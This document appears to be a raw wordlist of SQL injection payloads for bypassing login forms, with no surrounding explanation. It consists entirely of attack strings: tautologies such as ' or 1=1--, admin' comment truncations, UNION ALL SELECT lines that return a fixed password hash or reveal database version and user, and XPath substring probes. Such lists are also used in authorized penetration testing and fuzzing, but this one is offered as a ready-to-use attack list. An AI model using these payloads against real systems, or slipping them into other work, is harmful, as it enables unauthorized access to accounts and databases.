admin" or 1=1
" "
' or '1'='1
' group by username having 1=1--
' UNION ALL SELECT 1, @@version;#
" #
or true
==
" or "x"="x
') or ('x'='x
'/*
' OR 'x'='x'#;
1′) and '1′='1–
' or 1=1 --
' or uid like '%
' or ''-'
") or "1"="1"--
"-"
" or "1"="1
' UNION ALL SELECT system_user(),user();#
' or '' '
or 0=0 –
') or ('1'='1
admin' --
1'or'1'='1
'^'
') or ('x')=('
' or         0=0 #
" or ""*"
' or uname like '%
' #
admin" or 1=1/*
'or''=''or''='
" or ""="
'-'
admin' #
admin") or ("1"="1"/*
' or 1=1 –
'or''='
admin') or '1'='1'#
admin') or ('1'='1'/*
'="or'
or 0=0 #
' or 1=1#
' or user like '%
") or "1"="1"#
admin' and substring(password/text(),1,1)='7
') or ('x')=('x
admin') or ('1'='1'#
) or '1′='1–
' or 1=1--
' and 'one'='one–
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
admin' or '1'='1'#
admin" or 1=1--
admin" #
"&"
or 1=1--
" or 1=1#
') or '1'='1'--
"/*
admin' or 1=1--
admin' or 1=1#
" or "x"="
" or true--
or 0=0 --
﻿'or 1=1/*
﻿'-'
admin' or 1=1/*
' or username like '%
%' or '0'='0
" or 0=0 --
" or ""-"
"^"
admin' or '1'='1'/*
admin' or 1=1
"*"
" or "1"="1"--
" or 1=1 –
' and 1='1
admin' or '1'='1'--
' or 1=1;#
') or ('1'='1'--
'
' or true--
") or ("1"="1"/*
'&'
'or'='or'
' or 1=1
') or ('a'='a and hi") or ("a"="a
' or a=a--
' group by password having 1=1--
'or 1=1 or ''='
') or '1'='1--
") or ("a"="a
''or'='or'
'#
admin" or "1"="1"#
admin') or '1'='1'/*
') or ('1'='1'#
" or ""&"
' or '1'='1'#
=
admin" --
') or ('1'='1'/*
or 'a'='a'
") or ("1"="1"--
') or ('')=('
" or ""^"
' or 1=1–
" or 1--
' or 'one'='one–
' or 1=1 LIMIT 1;#
" or "1"="1"/*
admin" or 1=1#
'or'='1'
admin") or "1"="1"/*
')) or 1--
and 1=1–
" or 1=1 --
'=' 'or' and '=' 'or'
") or ("1"="1
' or 0=0 --
or 1=1#
")) or (("x"))=(("x
' and a='a
admin") or ("1"="1
" or "a"="a
') or '1'='1'/*
'or 1=1--
'or1=1--
')) or (('x'))=(('
' or 'one'='one
admin") or "1"="1
' or '1'='1'/*
' or 'a'='a
"or"="
") or "1"="1
") or ("x")=("x
admin" or "1"="1
'--
' and 'one'='one
admin"/*
admin" or "1"="1"--
"or"="a'='a
') or true--
) or (1=1
") or ("")=("
admin'/*
a'or'1=1--
' group by userid having 1=1--
admin") or "1"="1"#
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
"or=or"
admin') or ('1'='1
" or 0=0 #
" or "" "
admin") or ("1"="1"#
admin') or ('1'='1'--
or 'a='a
or true--
"or 1=1 or ""="
' or 'x'='x
' or userid like '%
' --
'or 1=1/*
) or ('1′='1–
"or "a"="a
a'or' 1=1--
admin') or '1'='1'--
' '
'or' '1'='1'
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
')) or (('x'))=(('x
") or ("x")=("
' or a=a–
' or '1′='1
admin'or 1=1 or ''='
' or ''&'
admin" or "1"="1"/*
") or true--
" or 1=1
" or 0=0 –
'or'1=1
admin") or "1"="1"--
admin') or '1'='1
') or 1--
') or ('a'='a
'or 1=1

' and substring(password/text(),1,1)='7
or 1=1
and 1=1
or 1=1–
or 1=1/*
' or '1'='1'--
' or ''*'
')) or ((''))=(('
" or "1"="1"#
' or 0=0 #
' or 1=1 limit 1 -- -+
'or"="a'='a
'or.'a.'='a
"or 1=1--
") or ("1"="1"#
" or 1=1–
like '%'
'or'1=1′
﻿' or''='
') or ('1'='1--
" --
") or 1--
"or1=1--
')) or true--
or1=1--
admin") or ("1"="1"--
") or "1"="1"/*
" or 1=1/*
" or 1=1--
'.).or.('.a.'='.a
') or '1'='1
' or 0=0 –
' or ''='
') or '1'='1'#
'*'
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
' or 'a'='a--
' or 1=1/*
admin"or 1=1 or ""="
' –
' or ''^'
admin' or '1'='1
